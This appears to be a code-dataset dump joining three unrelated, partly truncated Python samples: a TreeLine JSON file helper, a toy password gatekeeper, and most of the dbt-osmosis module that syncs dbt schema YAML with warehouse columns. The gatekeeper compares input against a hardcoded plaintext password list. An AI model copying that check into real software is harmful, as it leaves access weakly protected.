JSON_NODES = "nodes"
JSON_CHILDREN = "children"
JSON_DATA = "data"
JSON_FORMAT = "format"
JSON_UID = "uid"
JSON_PROPERTIES = "properties"
JSON_TLVERSION = "tlversion"
JSON_TOPNODES = "topnodes"
#endregion
#region Field Type Constants
FTYPE_TEXT = "Text"
FTYPE_HTMLTEXT = "HtmlText"
FTYPE_ONELINETEXT = "OneLineText"
FTYPE_SPACEDTEXT = "SpacedText"
FTYPE_NUMBER = "Number"
FTYPE_MATH = "Math"
FTYPE_NUMBERING = "Numbering"
FTYPE_DATE = "Date"
FTYPE_TIME = "Time"
FTYPE_DATETIME = "DateTime"
FTYPE_BOOLEAN = "Boolean"
FTYPE_CHOICE = "Choice"
FTYPE_AUTOCHOICE = "AutoChoice"
FTYPE_COMBINATION = "Combination"
FTYPE_AUTOCOMBINATION = "AutoCombination"
FTYPE_EXTERNALLINK = "ExternalLink"
FTYPE_INTERNALLINK = "InternalLink"
FTYPE_PICTURE = "Picture"
FTYPE_REGULAREXPRESSION = "RegularExpression"
#endregion
#region Other Constants
NATIVE_VERSION = "3.1.3" # the version that this code assumes
#endregion
#region Utility Functions
def cite(s):
    """Wrap a field name in TreeLine citation markers: ``{*name*}``."""
    return f"{{*{s}*}}"
def randhex():
    """Return 32 random hex characters."""
    # Format 128 random bits as a zero-padded 32-digit hex string. The old
    # code passed that string to random.randrange(), which raises TypeError.
    return "%032x" % random.getrandbits(4 * 32)
#endregion
#region Global Variables
CONTENT = "CONTENT" # the raw JSON content
PATH = "PATH" # the path the JSON defaults to save to
FORMATS = "FORMATS" # shortcut to formats section of CONTENT
NODES = "NODES" # shortcut to nodes section of CONTENT
PROPERTIES = "PROPERTIES" # shortcut to properties section of CONTENT
CHILDREN = "CHILDREN" # children sections, indexed by node UID
DATA = "DATA" # data sections, indexed by node UID
FORMAT = "FORMAT" # format names, indexed by node UID
TLVERSION = "TLVERSION" # tlversion info, as found in properties
TOPNODES = "TOPNODES" # topnodes UID list, as found in properties
INDENT = "INDENT" # number spaces to indent when saving JSON
g = {CONTENT: None,
PATH: None,
FORMATS: None,
NODES: None,
PROPERTIES: None,
CHILDREN: None,
DATA: None,
FORMAT: None,
TLVERSION: None,
TOPNODES: None,
INDENT: 2}
#endregion
#region Naked Treeline
naked = {
JSON_FORMATS: [
{JSON_FIELDS: [{JSON_FIELDNAME: "Name",
JSON_FIELDTYPE: FTYPE_TEXT}],
JSON_FORMATNAME: "DEFAULT",
JSON_OUTPUTLINES: ["{*Name*}"],
JSON_TITLELINE: "{*Name*}"}
],
JSON_NODES: [
{JSON_CHILDREN: [],
JSON_DATA: {"Name": "Main"},
JSON_FORMAT: "DEFAULT",
JSON_UID: "Main"}
],
JSON_PROPERTIES: {
JSON_TLVERSION: NATIVE_VERSION,
JSON_TOPNODES: ["Main"]
}
}
#endregion
#region Basic Manipulation
def read(path):
    """Read a .trln file into .content.

    .scan() is automatically called after reading the file.
    """
    g[PATH] = path
    # Context manager closes the handle promptly (old code leaked it);
    # utf-8 matches the encoding used by save().
    with open(path, encoding="utf-8") as fp:
        g[CONTENT] = json.load(fp)
    scan()
def new(path):
    """Start a new .trln file.

    Installs a deep copy of the ``naked`` skeleton as the current content
    (so the template itself is never mutated) and indexes it with scan().
    """
    g[PATH] = path
    g[CONTENT] = copy.deepcopy(naked)
    scan()
def save(path=None):
    """Save a .trln file.

    When path is not supplied, uses the path that was specified when the
    file was loaded.
    """
    # Honor an explicit path argument (the old body ignored it, always
    # writing to g[PATH] despite the docstring) and close the handle.
    target = g[PATH] if path is None else path
    with open(target, "w", encoding="utf-8") as fp:
        json.dump(g[CONTENT], fp, indent=g[INDENT])
def scan():
    """Scan .contents into indexed fields.

    Indexed fields are:
     * g[FORMATS]
     * g[NODES]
     * g[PROPERTIES]
     * g[CHILDREN]
     * g[DATA]
     * g[FORMAT]
     * g[TLVERSION]
     * g[TOPNODES]
    """
    content = g[CONTENT]
    g[FORMATS] = content[JSON_FORMATS]
    g[NODES] = content[JSON_NODES]
    g[PROPERTIES] = content[JSON_PROPERTIES]
    # Per-node indexes keyed by UID.
    g[CHILDREN] = {node[JSON_UID]: node[JSON_CHILDREN] for node in g[NODES]}
    g[DATA] = {node[JSON_UID]: node[JSON_DATA] for node in g[NODES]}
    g[FORMAT] = {node[JSON_UID]: node[JSON_FORMAT] for node in g[NODES]}
    g[TLVERSION] = g[PROPERTIES][JSON_TLVERSION]
    g[TOPNODES] = g[PROPERTIES][JSON_TOPNODES]
| StarcoderdataPython |
# Trivial gatekeeper: accept any password from the allowed list.
password = input('Enter the password:')
accepted = ['<PASSWORD>', '<PASSWORD>']
message = 'You may enter.' if password in accepted else 'Begone!'
print(message)
| StarcoderdataPython |
186620 | <reponame>z3z1ma/dbt-osmosis
from enum import Enum
from itertools import chain
from pathlib import Path
from typing import (Any, Dict, Iterable, Iterator, List, Mapping,
MutableMapping, Optional, Set, Tuple, Union)
import agate
import dbt.config.runtime as dbt_config
import dbt.parser.manifest as dbt_parser
from dbt.adapters.factory import (Adapter, get_adapter, register_adapter,
reset_adapters)
from dbt.contracts.connection import AdapterResponse
from dbt.contracts.graph.manifest import ManifestNode, NodeType
from dbt.contracts.graph.parsed import ColumnInfo, ParsedModelNode
from dbt.exceptions import CompilationException, RuntimeException
from dbt.flags import DEFAULT_PROFILES_DIR, set_from_args
from dbt.task.deps import DepsTask
from dbt.tracking import disable_tracking
from pydantic import BaseModel
from rich.progress import track
from ruamel.yaml import YAML
from dbt_osmosis.core.exceptions import (InvalidOsmosisConfig,
MissingOsmosisConfig,
SanitizationRequired)
from dbt_osmosis.core.logging import logger
# Opt out of dbt's anonymous usage tracking for all osmosis runs.
disable_tracking()
# Rich-markup template rendered per model by propagate_documentation_downstream.
AUDIT_REPORT = """
:white_check_mark: [bold]Audit Report[/bold]
-------------------------------
Database: [bold green]{database}[/bold green]
Schema: [bold green]{schema}[/bold green]
Table: [bold green]{table}[/bold green]
Total Columns in Database: {total_columns}
Total Documentation Coverage: {coverage}%
Action Log:
Columns Added to dbt: {n_cols_added}
Column Knowledge Inherited: {n_cols_doc_inherited}
Extra Columns Removed: {n_cols_removed}
"""
# TODO: Let user supply a custom config file / csv of strings which we consider "not-documented placeholders", these are just my own
# Descriptions equal to any of these are treated as "undocumented".
PLACEHOLDERS = [
    "Pending further documentation",
    "Pending further documentation.",
    "No description for this column",
    "No description for this column.",
    "Not documented",
    "Not documented.",
    "Undefined",
    "Undefined.",
    "",
]
# Separator between the adapter prefix and the relative path in patch_path.
FILE_ADAPTER_POSTFIX = "://"
class PseudoArgs:
    """Duck-typed stand-in for the argparse namespace dbt expects.

    Only the attributes read by dbt's RuntimeConfig / flags machinery are
    populated.
    """

    def __init__(
        self,
        threads: Optional[int] = 1,
        target: Optional[str] = None,
        profiles_dir: Optional[str] = None,
        project_dir: Optional[str] = None,
        vars: Optional[str] = "{}",
    ):
        self.threads = threads
        self.single_threaded = threads == 1
        # Only attach `target` when truthy: dbt distinguishes an absent
        # attribute from one set to None.
        if target:
            self.target = target
        self.profiles_dir = profiles_dir or DEFAULT_PROFILES_DIR
        self.project_dir = project_dir
        self.vars = vars  # JSON-encoded string of CLI vars
        self.dependencies = []
class OsmosisConfig(str, Enum):
    """File-layout strategies selectable via the `dbt-osmosis` model config.

    The value is the pattern used by get_target_schema_path to place yml files.
    """
    SchemaYaml = "schema.yml"        # single schema.yml per directory
    FolderYaml = "folder.yml"        # yml named after the parent folder
    ModelYaml = "model.yml"          # one yml per model, named after the model
    SchemaModelYaml = "schema/model.yml"  # per-model yml under a schema/ subdir
class SchemaFile(BaseModel):
    """Pairing of a model's declared target schema path and its current one."""
    # Where the dbt-osmosis config says the schema yml should live.
    target: Path
    # Where the schema yml actually lives now (None = undocumented model).
    current: Optional[Path] = None
    @property
    def is_valid(self) -> bool:
        # Valid means the file is already at its declarative target location.
        return self.current == self.target
class RestructureQuantum(BaseModel):
    """One unit of a restructure plan: content to write and files it replaces."""
    # Schema-file payload (e.g. {"version": 2, "models": [...]}) for the target.
    output: Dict[str, Any] = {}
    # Map of existing schema file -> model names migrating out of it.
    supersede: Dict[Path, List[str]] = {}
class DbtOsmosis:
    def __init__(
        self,
        fqn: Optional[str] = None,
        target: Optional[str] = None,
        profiles_dir: Optional[str] = None,
        project_dir: Optional[str] = None,
        threads: Optional[int] = 1,
        dry_run: bool = False,
    ):
        """Load the dbt project, verify the warehouse connection, parse the manifest.

        Args:
            fqn: Optional dot-joined fqn selector limiting which models are touched.
            target: dbt target name from profiles.yml; None uses the profile default.
            profiles_dir: Directory containing profiles.yml (defaults to dbt's).
            project_dir: Directory containing dbt_project.yml.
            threads: Adapter thread count; 1 implies single-threaded mode.
            dry_run: When True, file-mutating operations are skipped.
        """
        # Build pseudo args
        args = PseudoArgs(
            threads=threads,
            target=target,
            profiles_dir=profiles_dir,
            project_dir=project_dir,
        )
        self.args = args
        # Load dbt + verify connection to data warehouse
        set_from_args(args, args)
        self.project, self.profile = dbt_config.RuntimeConfig.collect_parts(args)
        self.config = dbt_config.RuntimeConfig.from_parts(self.project, self.profile, args)
        # Adapter registry is global in dbt; reset before registering ours.
        reset_adapters()
        register_adapter(self.config)
        self.adapter = self._verify_connection(get_adapter(self.config))
        # Parse project
        self.dbt = dbt_parser.ManifestLoader.get_full_manifest(self.config)
        # Selector Passed in From CLI
        self.fqn = fqn
        # Utilities
        self.yaml = self._build_yaml_parser()
        self.dry_run = dry_run
        self.track_package_install = (
            lambda *args, **kwargs: None
        )  # Monkey patching to make self compatible with DepsTask
@staticmethod
def _verify_connection(adapter: Adapter) -> Adapter:
try:
with adapter.connection_named("debug"):
adapter.debug_query()
except Exception as exc:
raise Exception("Could not connect to Database") from exc
else:
return adapter
@staticmethod
def _build_yaml_parser() -> YAML:
yaml = YAML()
yaml.indent(mapping=2, sequence=4, offset=2)
yaml.width = 800
yaml.preserve_quotes = True
yaml.default_flow_style = False
return yaml
    @property
    def project_name(self) -> str:
        """Name of the loaded dbt project."""
        return self.project.project_name
    @property
    def project_root(self) -> str:
        """Absolute root directory of the loaded dbt project."""
        return self.project.project_root
    def rebuild_dbt_manifest(self, reset: bool = False) -> None:
        """Re-parse the project, replacing self.dbt with a fresh manifest."""
        self.dbt = dbt_parser.ManifestLoader.get_full_manifest(self.config, reset=reset)
    @property
    def manifest(self) -> Dict[str, Any]:
        """Flattened (dict) view of the parsed manifest graph."""
        return self.dbt.flat_graph
@staticmethod
def get_patch_path(node: ManifestNode) -> Path:
return Path(node.patch_path.split(FILE_ADAPTER_POSTFIX)[-1])
    def execute_macro(
        self,
        macro: str,
        kwargs: Optional[Dict[str, Any]] = None,
        run_compiled_sql: bool = False,
        fetch: bool = False,
    ) -> Tuple[
        str, Optional[AdapterResponse], Optional[agate.Table]
    ]:  # returns Macro `return` value from Jinja be it string, SQL, or dict
        """Wraps adapter execute_macro.

        Renders `macro` against the loaded manifest; when run_compiled_sql is
        True the rendered result is also executed (with `fetch` controlling
        whether a result table is returned).
        """
        with self.adapter.connection_named("dbt-osmosis"):
            compiled_macro = self.adapter.execute_macro(
                macro_name=macro, manifest=self.dbt, kwargs=kwargs
            )
            if run_compiled_sql:
                resp, table = self.adapter.execute(compiled_macro, fetch=fetch)
                return compiled_macro, resp, table
        return compiled_macro, None, None
    def _filter_model(self, node: ManifestNode) -> bool:
        """Validates a node as being a targetable model. Validates both models and sources.

        A node passes when its resource type, package, materialization, and
        fqn prefix (against self.fqn, when set) all match.
        """
        # With no CLI selector, the node's own fqn is used, so fqn checks pass.
        fqn = self.fqn or ".".join(node.fqn[1:])
        fqn_parts = fqn.split(".")
        logger().debug("%s: %s -> %s", node.resource_type, fqn, node.fqn[1:])
        return (
            # Verify Resource Type
            node.resource_type in (NodeType.Model, NodeType.Source)
            # Verify Package == Current Project
            and node.package_name == self.project_name
            # Verify Materialized is Not Ephemeral if NodeType is Model [via short-circuit]
            and (node.resource_type != NodeType.Model or node.config.materialized != "ephemeral")
            # Verify FQN Length [Always true if no fqn was supplied]
            and len(node.fqn[1:]) >= len(fqn_parts)
            # Verify FQN Matches Parts [Always true if no fqn was supplied]
            and all(left == right for left, right in zip(fqn_parts, node.fqn[1:]))
        )
def filtered_models(
self, subset: Optional[MutableMapping[str, ManifestNode]] = None
) -> Iterator[Tuple[str, ManifestNode]]:
"""Generates an iterator of valid models"""
for unique_id, dbt_node in (
subset.items() if subset else chain(self.dbt.nodes.items(), self.dbt.sources.items())
):
if self._filter_model(dbt_node):
yield unique_id, dbt_node
    def get_osmosis_config(self, node: ManifestNode) -> Optional[OsmosisConfig]:
        """Validates a config string. If input is a source, we return the resource type str instead

        Raises MissingOsmosisConfig when a model has no `dbt-osmosis` config,
        and InvalidOsmosisConfig when the value is not a known strategy.
        """
        # Sources carry no dbt-osmosis layout config.
        if node.resource_type == NodeType.Source:
            return None
        osmosis_config = node.config.get("dbt-osmosis")
        if not osmosis_config:
            raise MissingOsmosisConfig(
                f"Config not set for model {node.name}, we recommend setting the config at a directory level through the `dbt_project.yml`"
            )
        try:
            return OsmosisConfig(osmosis_config)
        except ValueError as exc:
            raise InvalidOsmosisConfig(
                f"Invalid config for model {node.name}: {osmosis_config}"
            ) from exc
def get_schema_path(self, node: ManifestNode) -> Optional[Path]:
"""Resolve absolute schema file path for a manifest node"""
schema_path = None
if node.resource_type == NodeType.Model and node.patch_path:
schema_path: str = node.patch_path.partition(FILE_ADAPTER_POSTFIX)[-1]
elif node.resource_type == NodeType.Source:
if hasattr(node, "source_name"):
schema_path: str = node.path
if schema_path:
return Path(self.project_root).joinpath(schema_path)
    def get_target_schema_path(self, node: ManifestNode) -> Path:
        """Resolve the correct schema yml target based on the dbt-osmosis config for the model / directory"""
        osmosis_config = self.get_osmosis_config(node)
        # Sources (config is None) stay wherever they are currently declared.
        if not osmosis_config:
            return Path(node.root_path, node.original_file_path)
        # Here we resolve file migration targets based on the config
        if osmosis_config == OsmosisConfig.SchemaYaml:
            schema = "schema"
        elif osmosis_config == OsmosisConfig.FolderYaml:
            # fqn[-2] is the model's parent folder name.
            schema = node.fqn[-2]
        elif osmosis_config == OsmosisConfig.ModelYaml:
            schema = node.name
        elif osmosis_config == OsmosisConfig.SchemaModelYaml:
            schema = "schema/" + node.name
        else:
            raise InvalidOsmosisConfig(f"Invalid dbt-osmosis config for model: {node.fqn}")
        return Path(node.root_path, node.original_file_path).parent / Path(f"{schema}.yml")
    @staticmethod
    def get_database_parts(node: ManifestNode) -> Tuple[str, str, str]:
        """Return the (database, schema, identifier) triple for a node."""
        return node.database, node.schema, getattr(node, "alias", node.name)
    def get_base_model(self, node: ManifestNode) -> Dict[str, Any]:
        """Construct a base model object with model name, column names populated from database"""
        columns = self.get_columns(node)
        return {
            # Prefer the relation alias when the model declares one.
            "name": node.alias or node.name,
            "columns": [{"name": column_name} for column_name in columns],
        }
def bootstrap_existing_model(
self, model_documentation: Dict[str, Any], node: ManifestNode
) -> Dict[str, Any]:
"""Injects columns from database into existing model if not found"""
model_columns: List[str] = [
c["name"].lower() for c in model_documentation.get("columns", [])
]
database_columns = self.get_columns(node)
for column in database_columns:
if column.lower() not in model_columns:
logger().info(":syringe: Injecting column %s into dbt schema", column)
model_documentation.setdefault("columns", []).append({"name": column})
return model_documentation
    def get_columns(self, node: ManifestNode) -> List[str]:
        """Get all columns in a list for a model.

        Degrades gracefully: returns an empty list when the relation does not
        exist or introspection fails, logging the reason.
        """
        parts = self.get_database_parts(node)
        table = self.adapter.get_relation(*parts)
        columns = []
        if not table:
            logger().info(
                ":cross_mark: Relation %s.%s.%s does not exist in target database, cannot resolve columns",
                *parts,
            )
            return columns
        try:
            columns = [c.name for c in self.adapter.get_columns_in_relation(table)]
        except CompilationException as error:
            logger().info(
                ":cross_mark: Could not resolve relation %s.%s.%s against database active tables during introspective query: %s",
                *parts,
                str(error),
            )
        return columns
@staticmethod
def assert_schema_has_no_sources(schema: Mapping) -> Mapping:
"""Inline assertion ensuring that a schema does not have a source key"""
if schema.get("sources"):
raise SanitizationRequired(
"Found `sources:` block in a models schema file. We require you separate sources in order to organize your project."
)
return schema
    def build_schema_folder_mapping(
        self,
        target_node_type: Optional[Union[NodeType.Model, NodeType.Source]] = None,
    ) -> Dict[str, SchemaFile]:
        """Builds a mapping of models or sources to their existing and target schema file paths"""
        if target_node_type == NodeType.Source:
            # Source folder mapping is reserved for source importing
            target_nodes = self.dbt.sources
        elif target_node_type == NodeType.Model:
            target_nodes = self.dbt.nodes
        else:
            # No filter: consider models and sources together.
            target_nodes = {**self.dbt.nodes, **self.dbt.sources}
        # Container for output
        schema_map = {}
        logger().info("...building project structure mapping in memory")
        # Iterate over models and resolve current path vs declarative target path
        for unique_id, dbt_node in self.filtered_models(target_nodes):
            schema_path = self.get_schema_path(dbt_node)
            osmosis_schema_path = self.get_target_schema_path(dbt_node)
            schema_map[unique_id] = SchemaFile(target=osmosis_schema_path, current=schema_path)
        return schema_map
    def draft_project_structure_update_plan(self) -> Dict[Path, RestructureQuantum]:
        """Build project structure update plan based on `dbt-osmosis:` configs set across dbt_project.yml and model files.
        The update plan includes injection of undocumented models. Unless this plan is constructed and executed by the `commit_project_restructure` function,
        dbt-osmosis will only operate on models it is aware of through the existing documentation.
        Returns:
            MutableMapping: Update plan where dict keys consist of targets and contents consist of outputs which match the contents of the `models` to be output in the
            target file and supersede lists of what files are superseded by a migration
        """
        # Container for output
        blueprint: Dict[Path, RestructureQuantum] = {}
        logger().info(
            ":chart_increasing: Searching project stucture for required updates and building action plan"
        )
        with self.adapter.connection_named("dbt-osmosis"):
            # Only models whose current schema path differs from the target need action.
            for unique_id, schema_file in self.build_schema_folder_mapping(
                target_node_type=NodeType.Model
            ).items():
                if not schema_file.is_valid:
                    blueprint.setdefault(
                        schema_file.target,
                        RestructureQuantum(output={"version": 2, "models": []}, supersede={}),
                    )
                    node = self.dbt.nodes[unique_id]
                    if schema_file.current is None:
                        # Bootstrapping Undocumented Model
                        blueprint[schema_file.target].output["models"].append(
                            self.get_base_model(node)
                        )
                    else:
                        # Model Is Documented but Must be Migrated
                        if not schema_file.current.exists():
                            continue
                        # TODO: We avoid sources for complexity reasons but if we are opinionated, we don't have to
                        schema = self.assert_schema_has_no_sources(
                            self.yaml.load(schema_file.current)
                        )
                        models_in_file: Iterable[Dict[str, Any]] = schema.get("models", [])
                        for documented_model in models_in_file:
                            if documented_model["name"] == node.name:
                                # Bootstrapping Documented Model
                                blueprint[schema_file.target].output["models"].append(
                                    self.bootstrap_existing_model(documented_model, node)
                                )
                                # Target to supersede current
                                blueprint[schema_file.target].supersede.setdefault(
                                    schema_file.current, []
                                ).append(documented_model["name"])
                                break
                        else:
                            ...  # Model not found at patch path -- We should pass on this for now
                else:
                    ...  # Valid schema file found for model -- We will update the columns in the `Document` task
        return blueprint
    def commit_project_restructure_to_disk(
        self, blueprint: Optional[Dict[Path, RestructureQuantum]] = None
    ) -> bool:
        """Commit a project restructure plan to the filesystem, fully or partially
        superseding existing schema files as needed.

        Args:
            blueprint (Dict[Path, RestructureQuantum]): Project restructure plan as typically created by `draft_project_structure_update_plan`
        Returns:
            bool: True if the project was restructured, False if no action was required
        """
        # Build blueprint if not user supplied
        if not blueprint:
            blueprint = self.draft_project_structure_update_plan()
        # Verify we have actions in the plan
        if not blueprint:
            logger().info(":1st_place_medal: Project structure approved")
            return False
        # Print plan for user auditability
        self.pretty_print_restructure_plan(blueprint)
        logger().info(
            ":construction_worker: Executing action plan and conforming projecting schemas to defined structure"
        )
        for target, structure in blueprint.items():
            if not target.exists():
                # Build File
                logger().info(":construction: Building schema file %s", target.name)
                if not self.dry_run:
                    target.parent.mkdir(exist_ok=True, parents=True)
                    target.touch()
                    self.yaml.dump(structure.output, target)
            else:
                # Update File
                logger().info(":toolbox: Updating schema file %s", target.name)
                target_schema: Dict[str, Any] = self.yaml.load(target)
                if "version" not in target_schema:
                    target_schema["version"] = 2
                target_schema.setdefault("models", []).extend(structure.output["models"])
                if not self.dry_run:
                    self.yaml.dump(target_schema, target)
            # Clean superseded schema files
            # NOTE(review): local name `dir` shadows the builtin; it is actually
            # a schema-file Path — consider renaming in a future pass.
            for dir, models in structure.supersede.items():
                preserved_models = []
                raw_schema: Dict[str, Any] = self.yaml.load(dir)
                models_marked_for_superseding = set(models)
                models_in_schema = set(map(lambda mdl: mdl["name"], raw_schema.get("models", [])))
                non_superseded_models = models_in_schema - models_marked_for_superseding
                if len(non_superseded_models) == 0:
                    # Every model migrated out -- the whole file can be dropped.
                    logger().info(":rocket: Superseded schema file %s", dir.name)
                    if not self.dry_run:
                        dir.unlink(missing_ok=True)
                else:
                    # Keep only the models that were not migrated.
                    for model in raw_schema["models"]:
                        if model["name"] in non_superseded_models:
                            preserved_models.append(model)
                    raw_schema["models"] = preserved_models
                    if not self.dry_run:
                        self.yaml.dump(raw_schema, dir)
                    logger().info(
                        ":satellite: Model documentation migrated from %s to %s",
                        dir.name,
                        target.name,
                    )
        return True
@staticmethod
def pretty_print_restructure_plan(blueprint: Dict[Path, RestructureQuantum]) -> None:
logger().info(
list(
map(
lambda plan: (blueprint[plan].supersede or "CREATE", "->", plan),
blueprint.keys(),
)
)
)
    def build_node_ancestor_tree(
        self,
        node: ManifestNode,
        family_tree: Optional[Dict[str, List[str]]] = None,
        members_found: Optional[List[str]] = None,
        depth: int = 0,
    ) -> Dict[str, List[str]]:
        """Recursively build dictionary of parents in generational order.

        Keys are "generation_<depth>"; members_found de-duplicates nodes that
        appear in multiple lineages so each ancestor is recorded once.
        """
        if family_tree is None:
            family_tree = {}
        if members_found is None:
            members_found = []
        for parent in node.depends_on.nodes:
            # Parent may be a model or a source; check both registries.
            member = self.dbt.nodes.get(parent, self.dbt.sources.get(parent))
            if member and parent not in members_found:
                family_tree.setdefault(f"generation_{depth}", []).append(parent)
                members_found.append(parent)
                # Recursion
                family_tree = self.build_node_ancestor_tree(
                    member, family_tree, members_found, depth + 1
                )
        return family_tree
    def inherit_column_level_knowledge(
        self,
        family_tree: Dict[str, Any],
    ) -> Dict[str, Dict[str, Any]]:
        """Inherit knowledge from ancestors in reverse insertion order to ensure that the most recent ancestor is always the one to inherit from

        Returns a mapping of column name -> merged column info, with a
        "progenitor" key naming the first (oldest) ancestor that knew of it.
        """
        knowledge: Dict[str, Dict[str, Any]] = {}
        # reversed() over the dict walks generations oldest-first, so closer
        # ancestors overwrite what more distant ones contributed.
        for generation in reversed(family_tree):
            for ancestor in family_tree[generation]:
                member: ManifestNode = self.dbt.nodes.get(ancestor, self.dbt.sources.get(ancestor))
                if not member:
                    continue
                for name, info in member.columns.items():
                    knowledge.setdefault(name, {"progenitor": ancestor})
                    deserialized_info = info.to_dict()
                    # Handle Info:
                    # 1. tags are additive
                    # 2. descriptions are overriden
                    # 3. meta is merged
                    # 4. tests are ignored until I am convinced those shouldn't be hand curated with love
                    if deserialized_info["description"] in PLACEHOLDERS:
                        deserialized_info.pop("description", None)
                    deserialized_info["tags"] = list(
                        set(deserialized_info.pop("tags", []) + knowledge[name].get("tags", []))
                    )
                    if not deserialized_info["tags"]:
                        deserialized_info.pop("tags")  # poppin' tags like Macklemore
                    deserialized_info["meta"] = {
                        **knowledge[name].get("meta", {}),
                        **deserialized_info["meta"],
                    }
                    if not deserialized_info["meta"]:
                        deserialized_info.pop("meta")
                    knowledge[name].update(deserialized_info)
        return knowledge
def get_node_columns_with_inherited_knowledge(
self,
node: ManifestNode,
) -> Dict[str, Dict[str, Any]]:
"""Build a knowledgebase for the model based on iterating through ancestors"""
family_tree = self.build_node_ancestor_tree(node)
knowledge = self.inherit_column_level_knowledge(family_tree)
return knowledge
@staticmethod
def get_column_sets(
database_columns: Iterable[str],
yaml_columns: Iterable[str],
documented_columns: Iterable[str],
) -> Tuple[List[str], List[str], List[str]]:
"""Returns:
missing_columns: Columns in database not in dbt -- will be injected into schema file
undocumented_columns: Columns missing documentation -- descriptions will be inherited and injected into schema file where prior knowledge exists
extra_columns: Columns in schema file not in database -- will be removed from schema file
"""
missing_columns = [
x for x in database_columns if x.lower() not in (y.lower() for y in yaml_columns)
]
undocumented_columns = [
x for x in database_columns if x.lower() not in (y.lower() for y in documented_columns)
]
extra_columns = [
x for x in yaml_columns if x.lower() not in (y.lower() for y in database_columns)
]
return missing_columns, undocumented_columns, extra_columns
    def propagate_documentation_downstream(self, force_inheritance: bool = False) -> None:
        """For every filtered model, sync its schema file with the database and
        inherit column documentation from ancestors.

        Args:
            force_inheritance: Treat every column as undocumented so ancestor
                knowledge overwrites existing docs rather than only filling gaps.
        """
        schema_map = self.build_schema_folder_mapping()
        with self.adapter.connection_named("dbt-osmosis"):
            for unique_id, node in track(list(self.filtered_models())):
                logger().info("\n:point_right: Processing model: [bold]%s[/bold] \n", unique_id)
                # Get schema file path, must exist to propagate documentation
                schema_path: Optional[SchemaFile] = schema_map.get(unique_id)
                if schema_path is None or schema_path.current is None:
                    logger().info(
                        ":bow: No valid schema file found for model %s", unique_id
                    )  # We can't take action
                    continue
                # Build Sets
                database_columns: Set[str] = set(self.get_columns(node))
                yaml_columns: Set[str] = set(column for column in node.columns)
                if not database_columns:
                    logger().info(
                        ":safety_vest: Unable to resolve columns in database, falling back to using yaml columns as base column set\n"
                    )
                    database_columns = yaml_columns
                # Get documentated columns
                documented_columns: Set[str] = set(
                    column
                    for column, info in node.columns.items()
                    if info.description and info.description not in PLACEHOLDERS
                )
                # Queue
                missing_columns, undocumented_columns, extra_columns = self.get_column_sets(
                    database_columns, yaml_columns, documented_columns
                )
                if force_inheritance:
                    # Consider all columns "undocumented" so that inheritance is not selective
                    undocumented_columns = database_columns
                # Engage
                n_cols_added = 0
                n_cols_doc_inherited = 0
                n_cols_removed = 0
                if len(missing_columns) > 0 or len(undocumented_columns) or len(extra_columns) > 0:
                    schema_file = self.yaml.load(schema_path.current)
                    (
                        n_cols_added,
                        n_cols_doc_inherited,
                        n_cols_removed,
                    ) = self.update_schema_file_and_node(
                        missing_columns,
                        undocumented_columns,
                        extra_columns,
                        node,
                        schema_file,
                    )
                if n_cols_added + n_cols_doc_inherited + n_cols_removed > 0:
                    # Dump the mutated schema file back to the disk
                    if not self.dry_run:
                        self.yaml.dump(schema_file, schema_path.current)
                    logger().info(":sparkles: Schema file updated")
                # Print Audit Report
                n_cols = float(len(database_columns))
                n_cols_documented = float(len(documented_columns)) + n_cols_doc_inherited
                perc_coverage = (
                    min(100.0 * round(n_cols_documented / n_cols, 3), 100.0)
                    if n_cols > 0
                    else "Unable to Determine"
                )
                logger().info(
                    AUDIT_REPORT.format(
                        database=node.database,
                        schema=node.schema,
                        table=node.name,
                        total_columns=n_cols,
                        n_cols_added=n_cols_added,
                        n_cols_doc_inherited=n_cols_doc_inherited,
                        n_cols_removed=n_cols_removed,
                        coverage=perc_coverage,
                    )
                )
@staticmethod
def remove_columns_not_in_database(
extra_columns: Iterable[str],
node: ManifestNode,
yaml_file_model_section: Dict[str, Any],
) -> int:
"""Removes columns found in dbt model that do not exist in database from both node and model simultaneously
THIS MUTATES THE NODE AND MODEL OBJECTS so that state is always accurate"""
changes_committed = 0
for column in extra_columns:
node.columns.pop(column, None)
yaml_file_model_section["columns"] = [
c for c in yaml_file_model_section["columns"] if c["name"] != column
]
changes_committed += 1
logger().info(":wrench: Removing column %s from dbt schema", column)
return changes_committed
    def update_undocumented_columns_with_prior_knowledge(
        self,
        undocumented_columns: Iterable[str],
        node: ManifestNode,
        yaml_file_model_section: Dict[str, Any],
    ) -> int:
        """Update undocumented columns with prior knowledge in node and model simultaneously
        THIS MUTATES THE NODE AND MODEL OBJECTS so that state is always accurate

        Returns the number of columns that inherited documentation.
        """
        knowledge = self.get_node_columns_with_inherited_knowledge(node)
        # Only these keys may be inherited; tests etc. stay hand-curated.
        inheritables = ("description", "tags", "meta")
        changes_committed = 0
        for column in undocumented_columns:
            prior_knowledge = knowledge.get(column, {})
            progenitor = prior_knowledge.pop("progenitor", "Unknown")
            prior_knowledge = {k: v for k, v in prior_knowledge.items() if k in inheritables}
            if not prior_knowledge:
                continue
            if column not in node.columns:
                node.columns[column] = ColumnInfo.from_dict({"name": column, **prior_knowledge})
            else:
                node.columns[column].replace(kwargs={"name": column, **prior_knowledge})
            for model_column in yaml_file_model_section["columns"]:
                if model_column["name"] == column:
                    model_column.update(prior_knowledge)
            changes_committed += 1
            logger().info(
                ":light_bulb: Column %s is inheriting knowledge from the lineage of progenitor (%s)",
                column,
                progenitor,
            )
            logger().info(prior_knowledge)
        return changes_committed
    @staticmethod
    def add_missing_cols_to_node_and_model(
        missing_columns: Iterable,
        node: ManifestNode,
        yaml_file_model_section: Dict[str, Any],
    ) -> int:
        """Add missing columns to node and model simultaneously
        THIS MUTATES THE NODE AND MODEL OBJECTS so that state is always accurate

        Returns the number of columns injected.
        """
        changes_committed = 0
        for column in missing_columns:
            node.columns[column] = ColumnInfo.from_dict({"name": column})
            yaml_file_model_section.setdefault("columns", []).append({"name": column})
            changes_committed += 1
            logger().info(":syringe: Injecting column %s into dbt schema", column)
        return changes_committed
    def update_schema_file_and_node(
        self,
        missing_columns: Iterable[str],
        undocumented_columns: Iterable[str],
        extra_columns: Iterable[str],
        node: ManifestNode,
        yaml_file: Dict[str, Any],
    ) -> Tuple[int, int, int]:
        """Take action on a schema file mirroring changes in the node.

        Returns (n_added, n_inherited, n_removed); (0, 0, 0) when the node's
        section cannot be located in the yaml document.
        """
        # We can extrapolate this to a general func
        noop = 0, 0, 0
        if node.resource_type == NodeType.Source:
            KEY = "tables"
            yaml_file_models = None
            # Locate the matching source block; its "tables" list holds the models.
            for src in yaml_file.get("sources", []):
                if src["name"] == node.source_name:
                    # Scope our pointer to a specific portion of the object
